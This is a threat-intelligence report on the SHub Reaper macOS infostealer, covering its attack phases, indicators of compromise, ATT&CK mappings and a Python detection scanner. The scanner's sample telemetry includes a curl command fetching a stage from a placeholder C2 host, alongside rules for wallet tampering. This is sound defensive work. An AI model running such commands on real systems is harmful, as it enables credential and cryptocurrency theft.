
SHub Reaper A macOS Stealer Wearing Three Trusted Masks

Amber | Attack Report

Summary

SHub Reaper is a newly identified macOS infostealer malware first detected in 2026, targeting users globally — excluding the Commonwealth of Independent States (CIS). This advanced macOS credential-stealing malware chains together three trusted brand impersonations — Apple, Google, and Microsoft — within a single, sophisticated attack chain. Victims of the SHub Reaper macOS stealer are lured via fake WeChat and Miro installers, coerced into executing a fraudulent Apple security update, and silently stripped of browser credentials, Keychain data, and cryptocurrency wallet assets.

The SHub Reaper macOS malware establishes long-term persistence by masquerading as a Google Software Update LaunchAgent, providing attackers a persistent remote code execution backdoor that survives system reboots. This macOS infostealer threat poses a significant risk to cryptocurrency holders, enterprise users, and individuals using major browsers and password managers on macOS systems.

First Seen: 2026
Malware: SHub Reaper
Platform: macOS
Targeted Regions: Global (excl. CIS)
Report Type: Attack Report
Threat Level: Amber
Targeted products & applications

Impersonated lures: WeChat, Miro, Apple XProtectRemediator, Google Software Update. Targeted browsers: Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, Orion. Password managers: 1Password, Bitwarden, LastPass. Browser-extension wallets: MetaMask, Phantom. Desktop crypto wallets: Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, Electrum, Trezor Suite. System data: macOS Keychain, iCloud account data, Telegram session data.


Attack Details

The SHub Reaper macOS infostealer attack unfolds in four distinct phases, combining social engineering, anti-analysis evasion, credential harvesting, and persistent backdoor installation on macOS systems.

Phase 1 — Initial access via fake installers & victim profiling
The SHub Reaper macOS stealer attack begins on fake installer pages impersonating WeChat and Miro download sites, hosted on typosquatted domains designed to mimic Microsoft and other trusted brands. Before delivering any macOS malware payload, the malicious page silently profiles the visitor — capturing IP address, geolocation, graphics fingerprint, and signs of virtual machines or VPNs — while also enumerating installed browser-based password managers and cryptocurrency wallet extensions. Developer tools are blocked, debugging keystrokes are trapped, and a Russian “Access Denied” screen is displayed if analysis is suspected. All collected visitor profiling data is exfiltrated via a Telegram bot to the attackers.
Phase 2 — AppleScript-based execution & in-memory payload delivery
Once a viable macOS target is identified, SHub Reaper bypasses Apple’s “paste into Terminal” fix by launching macOS Script Editor with a pre-loaded malicious AppleScript. The harmful command is hidden below ASCII art and fake installer text, invisible to the user. Clicking “Run” triggers a convincing “Downloading Apple Security Update” message while silently fetching and executing the next-stage macOS malware payload. The stealer performs a Russian language check and exits if detected; otherwise it downloads and runs the main stealer script entirely in memory — leaving no artifacts on disk — evading traditional file-based macOS endpoint detection.
Phase 3 — Credential harvesting, data exfiltration & document theft
SHub Reaper displays a fake macOS password prompt to capture the user’s login credentials, then harvests data across all major browsers (Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, Orion), macOS Keychain, iCloud account data, Telegram session data, and cryptocurrency wallets including Exodus, Atomic Wallet, Ledger Live, Electrum, and Trezor Suite. A document-stealing module modelled on Atomic macOS Stealer (AMOS) sweeps Desktop and Documents folders for business and financial files up to 150 MB, automatically splitting large collections into chunked ZIP archives for upload to the attacker’s command-and-control (C2) server.
Phase 4 — Crypto wallet hijacking & persistent backdoor installation
After initial macOS credential theft, SHub Reaper compromises installed cryptocurrency wallets by replacing their core app.asar files with tampered copies from the attacker’s server, enabling interception of future crypto transactions. For persistence, the macOS malware disguises itself as a Google Software Update component, registering a LaunchAgent background task that beacons every 60 seconds. This persistent backdoor downloads and executes attacker commands with user privileges — and survives system reboots — giving threat actors prolonged remote access to the compromised macOS host.

Recommendations

Security teams and macOS administrators should implement the following defensive measures to detect and mitigate SHub Reaper macOS infostealer attacks:

Monitor for suspicious AppleScript and osascript activity
Alert on osascript and Script Editor processes that spawn curl, zsh, or sh child processes; on Script Editor execution within seconds of browser activity; and on AppleScript invocations reading com.apple.HIToolbox.plist (the keyboard-layout preferences used for the language check) or writing to /tmp/shub_ paths.
Detect staging and chunked exfiltration
Build EDR detections for newly created directories matching /tmp/shub_, the helper script /tmp/shub_split.sh, and ZIP archives matching /tmp/shub_mzip_*.zip, especially when followed by outbound curl requests to unfamiliar HTTPS endpoints.
Detect cryptocurrency wallet app.asar tampering
File-integrity-monitor the app.asar files inside Exodus, Atomic Wallet, Ledger Live, Ledger Wallet, Electrum, and Trezor Suite installations. Trigger alerts on xattr -cr invocations against application bundles and on codesign operations producing ad hoc signatures on wallet binaries.
Enforce application allow-listing and strict code-signing verification
Use Apple’s Endpoint Security framework, third-party EDR solutions, or Santa to allow-list approved applications and alert on execution of ad hoc-signed or unsigned binaries, particularly those written into application bundles such as modified app.asar files used by SHub Reaper for macOS wallet hijacking.
Inspect for anti-analysis web fingerprinting
Tune web proxy and browser-isolation telemetry to flag pages performing WebGL fingerprinting, VM/VPN detection, browser-extension enumeration, and continuous-debugger loops. These behaviors precede SHub Reaper macOS malware payload delivery and are common across the broader SHub infostealer family.
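The host-side detections listed above, worked into a small event scanner as an added example (not HivePro's code or a tool from the advisory). The event shape, rule names and the C2 placeholder host are assumptions; the staging paths, tool invocations and wallet bundle names come from the advisory.

```python
import re
from collections import Counter, namedtuple
# Assumed minimal EDR event: "process" (name=image, detail=command line, parent=parent image)
# or "file_write" (name=path written).
Event = namedtuple("Event", "kind parent name detail")

SCRIPT_HOSTS = {"osascript", "Script Editor"}
SHELLS_AND_FETCHERS = {"curl", "zsh", "sh"}
WALLET_APPS = ("Exodus", "Atomic Wallet", "Ledger Live", "Ledger Wallet",
               "Electrum", "Trezor Suite")
WALLET_BUNDLE_RE = re.compile(
    r"/(?:" + "|".join(map(re.escape, WALLET_APPS)) + r")\.app(?:/|\s|$)")
STAGING_RE = re.compile(r"^/tmp/shub_(?:log\.zip|split\.sh|mzip_.*\.zip)$")
XATTR_CLEAR_RE = re.compile(r"\bxattr\b.*\s-cr\s.*\.app(?:/|\s|$)")
ADHOC_SIGN_RE = re.compile(r"(?:^|\s)(?:-s|--sign)\s+-(?:\s|$)")  # identity "-" = ad hoc signature

def scan(events):
    """Return (rule_name, event) pairs for events matching the advisory's detections."""
    findings = []
    for ev in events:
        if ev.kind == "process":
            if ev.parent in SCRIPT_HOSTS and ev.name in SHELLS_AND_FETCHERS:
                findings.append(("script_host_spawns_shell", ev))
            elif ev.name == "xattr" and XATTR_CLEAR_RE.search(ev.detail):
                findings.append(("xattr_clear_on_app_bundle", ev))
            elif (ev.name == "codesign" and ADHOC_SIGN_RE.search(ev.detail)
                  and WALLET_BUNDLE_RE.search(ev.detail)):
                findings.append(("adhoc_codesign_on_wallet", ev))
        elif ev.kind == "file_write":
            if STAGING_RE.match(ev.name):
                findings.append(("shub_staging_path", ev))
            elif ev.name.endswith("/app.asar") and WALLET_BUNDLE_RE.search(ev.name):
                findings.append(("wallet_asar_modified", ev))
    return findings

def rule_counts(events):
    return Counter(rule for rule, _ in scan(events))
# Constructed sample telemetry (not from a real infection); the C2 host is a placeholder,
# the file names follow the advisory's IoC patterns.
SAMPLE_EVENTS = [
    Event("process", "Safari", "Script Editor", "open -a 'Script Editor'"),
    Event("process", "Script Editor", "sh", "sh -c 'curl -fsSL https://c2.example.invalid/stage'"),
    Event("file_write", "zsh", "/tmp/shub_split.sh", ""),
    Event("file_write", "zsh", "/tmp/shub_mzip_001.zip", ""),
    Event("process", "zsh", "xattr", "xattr -cr /Applications/Exodus.app"),
    Event("process", "zsh", "codesign", "codesign --force --sign - /Applications/Exodus.app"),
    Event("file_write", "zsh", "/Applications/Exodus.app/Contents/Resources/app.asar", ""),
    Event("process", "Terminal", "curl", "curl https://example.org"),  # benign: no script-host parent
]
```

Running scan(SAMPLE_EVENTS) yields six findings; the benign Terminal-launched curl and the Script Editor launch itself produce none, which is the intended baseline for the parent/child rule.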

Indicators of Compromise (IoCs)

The following indicators of compromise (IoCs) are associated with the SHub Reaper macOS infostealer campaign. Security teams should block these domains and URLs, and monitor for these file paths across macOS endpoints. Note that the LaunchAgent label com.google.keystone.agent is also used by Google's genuine updater, so the plist path alone is not conclusive; compare the program it launches against the GoogleUpdate.app path listed here.

Type        Value
Domains     hebsbsbzjsjshduxbs[.]xyz
            qq-0732gwh22[.]com
            mlcrosoft[.]co[.]com
            mlroweb[.]com
URLs        hxxps[:]//hebsbsbzjsjshduxbs[.]xyz/api/debug/event
            hxxps[:]//hebsbsbzjsjshduxbs[.]xyz/api/bot/heartbeat
            hxxps[:]//hebsbsbzjsjshduxbs[.]xyz/gate
            hxxps[:]//hebsbsbzjsjshduxbs[.]xyz/gate/chunk
File Paths  ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate
            ~/Library/LaunchAgents/com.google.keystone.agent.plist
            /tmp/shub_log.zip
            /tmp/shub_split.sh
            /tmp/shub_mzip_*.zip
            /tmp/.c.sh
            /tmp/*_asar.zip

MITRE ATT&CK TTPs

The SHub Reaper macOS infostealer campaign maps to the following MITRE ATT&CK tactics and techniques:

Tactic | Technique | Sub-technique
Resource Development | T1583: Acquire Infrastructure | T1583.001: Domains
Initial Access | T1189: Drive-by Compromise | -
Execution | T1059: Command and Scripting Interpreter | T1059.002: AppleScript
Execution | T1059: Command and Scripting Interpreter | T1059.004: Unix Shell
Execution | T1204: User Execution | T1204.002: Malicious File
Persistence | T1543: Create or Modify System Process | T1543.001: Launch Agent
Defense Evasion | T1036: Masquerading | T1036.005: Match Legitimate Resource Name or Location
Defense Evasion | T1140: Deobfuscate/Decode Files or Information | -
Defense Evasion | T1553: Subvert Trust Controls | T1553.001: Gatekeeper Bypass
Defense Evasion | T1553: Subvert Trust Controls | T1553.002: Code Signing
Defense Evasion | T1497: Virtualization/Sandbox Evasion | T1497.001: System Checks
Defense Evasion | T1622: Debugger Evasion | -
Credential Access | T1056: Input Capture | T1056.002: GUI Input Capture
Credential Access | T1555: Credentials from Password Stores | T1555.001: Keychain
Credential Access | T1555: Credentials from Password Stores | T1555.003: Credentials from Web Browsers
Credential Access | T1555: Credentials from Password Stores | T1555.005: Password Managers
Discovery | T1083: File and Directory Discovery | -
Discovery | T1217: Browser Information Discovery | -
Discovery | T1614: System Location Discovery | T1614.001: System Language Discovery
Collection | T1005: Data from Local System | -
Collection | T1560: Archive Collected Data | T1560.001: Archive via Utility
Collection | T1074: Data Staged | T1074.001: Local Data Staging
Command & Control | T1071: Application Layer Protocol | T1071.001: Web Protocols
Command & Control | T1105: Ingress Tool Transfer | -
Exfiltration | T1041: Exfiltration Over C2 Channel | -
Exfiltration | T1567: Exfiltration Over Web Service | -
Impact | T1565: Data Manipulation | T1565.001: Stored Data Manipulation
